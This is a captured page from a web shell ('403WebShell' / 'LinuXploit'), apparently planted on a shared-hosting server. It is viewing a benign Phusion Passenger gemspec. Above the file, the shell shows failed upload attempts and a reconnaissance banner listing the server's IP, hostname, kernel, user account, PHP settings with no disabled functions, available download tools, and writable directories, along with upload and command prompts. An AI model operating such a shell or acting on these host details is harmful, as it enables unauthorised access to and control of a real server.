Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.145.166.223
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/cpanel/ea-ruby27/src/passenger-release-6.0.23/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/cpanel/ea-ruby27/src/passenger-release-6.0.23//passenger.gemspec
source_root = File.expand_path(File.dirname(__FILE__))
$LOAD_PATH.unshift("#{source_root}/src/ruby_supportlib")
require 'rubygems'
require 'phusion_passenger'
PhusionPassenger.locate_directories
PhusionPassenger.require_passenger_lib 'packaging'

Gem::Specification.new do |s|
  s.platform = Gem::Platform::RUBY
  s.homepage = "https://www.phusionpassenger.com/"
  s.summary = "A fast and robust web server and application server for Ruby, Python and Node.js"
  s.name = PhusionPassenger::PACKAGE_NAME
  s.version = PhusionPassenger::VERSION_STRING
  s.author = "Phusion - http://www.phusion.nl/"
  s.email = "software-signing@phusion.nl"
  s.require_paths = ["src/ruby_supportlib"]
  s.metadata = {
    "bug_tracker_uri"   => "https://github.com/phusion/passenger/issues",
    "changelog_uri"     => "https://github.com/phusion/passenger/blob/stable-#{PhusionPassenger::VERSION_STRING.split('.').slice(0,2).join('.')}/CHANGELOG",
    "documentation_uri" => "https://www.phusionpassenger.com/docs/",
    "homepage_uri"      => "https://www.phusionpassenger.com/",
    "source_code_uri"   => "https://github.com/phusion/passenger",
    "mailing_list_uri"  => "https://www.phusionpassenger.com/contact",
    "wiki_uri"          => "https://github.com/phusion/passenger/wiki"
  }
  s.add_dependency 'rake', '>= 12.3.3'
  s.add_dependency 'rack', '>= 1.6.13'
  s.add_dependency 'rackup'
  s.files = Dir[*PhusionPassenger::Packaging::GLOB] -
    Dir[*PhusionPassenger::Packaging::EXCLUDE_GLOB]
  s.executables = PhusionPassenger::Packaging::USER_EXECUTABLES +
    PhusionPassenger::Packaging::SUPER_USER_EXECUTABLES
  s.description = "A modern web server and application server for Ruby, Python and Node.js, " +
    "optimized for performance, low memory usage and ease of use."

  if ENV['OFFICIAL_RELEASE']
    s.extensions = ["src/helper-scripts/download_binaries/extconf.rb"]
  end
end

Youez - 2016 - github.com/yon3zu
LinuXploit